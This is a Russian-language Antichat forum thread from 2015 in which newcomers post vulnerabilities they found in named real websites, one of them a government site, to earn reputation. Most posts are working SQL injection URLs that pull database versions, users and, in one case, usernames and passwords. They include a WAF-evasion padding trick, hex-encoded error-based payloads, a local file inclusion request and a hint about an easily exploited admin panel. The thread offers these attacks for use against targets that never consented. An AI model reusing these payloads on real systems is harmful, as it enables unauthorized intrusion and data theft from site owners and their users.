Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Уязвимости SQLi, XSS и другие. (https://forum.antichat.xyz/showthread.php?t=424991)

Егорыч+++ 10.05.2015 10:12

Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.

Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:

Google:

Код:

Code:
site:antichat.ru ваш_сайт_с_уязвимостью.ру

Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.

Цитата:

Сообщение от BigBear
BigBear said:

Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.


BabaDook 10.05.2015 11:30

Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-

Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .

BabaDook 10.05.2015 11:37

Три lfi

http://greyslon.ru/index.php

post

action=register

&ajax=true

&data=login%3De%26email%3De%26pass%3De%26repass%3D e%26payeer%3De%26captcha%3De

&page=../info

Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла

BabaDook 10.05.2015 12:49

bidderland.co.in/siteadmin

Эта уязвимость эксплуатируется за 5 секунд.

нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.

WallHack 10.05.2015 20:16

Цитата:

Сообщение от tiger_x
tiger_x said:

Первая SQL
http://www.c2-int.com/news-full.php?id=1278'

А что не раскрутил ?

Код:

Code:
http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+

Версия: 5.5.43-37.2

User: c2deuts_ice@localhost

-----------------------------

Цитата:

Сообщение от None
Вторая XSS

Зачем делать несколько постов можно в одном все выложить

BigBear 10.05.2015 20:39

Цитата:

Сообщение от tiger_x
tiger_x said:

Просто прямо сейчас ищу )) Как нахожу выкладываю!

Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.

frank 10.05.2015 21:02

Код HTML:

HTML:
http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+

5.5.40-0ubuntu0.12.04.1 - вывод в заголовке

Код HTML:

HTML:
http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+

5.6.23

Код HTML:

HTML:
http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+

4.1.18-nt

frank 10.05.2015 23:25

Код HTML:

HTML:
http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

idserver_damico@winwebs03.cpt.wa.co.za

idserver_damicodb

5.5.42-cll

Mister_Bert0ni 11.05.2015 00:51

http://goo.gl/imjzsb

http://goo.gl/8IKVeV

http://goo.gl/wYRBLz

http://emofans.ru/gallery/emowallp/

POST_DATA:

foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0 x7e7e496e6a6563746564204279204d69737465725f4265727 4306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version() )e)f)x)) -- -


https://www.choosewellness.com.ph/ca...entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e20 7374796c653d22666f6e742d66616d696c793a4963656c616e 643b636f6c6f723a7265643b73697a653a353b746578742d73 6861646f773a23303030203070782030707820337078223e4d 69737465725f42657274306e693c62723e,0x4461746162617 365203a3a202020,DATABASE(),0x3c62723e506f727420203 a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3 a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSIO N_COMPILE_MACHINE,0x3c62723e56657273696f6e206f6620 4461746162617365203a3a2020,version(),0xa3c62723e48 6f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e ))x)x)

Mister_Bert0ni 11.05.2015 00:55

Демонстрация SQLi от меня


Время: 03:32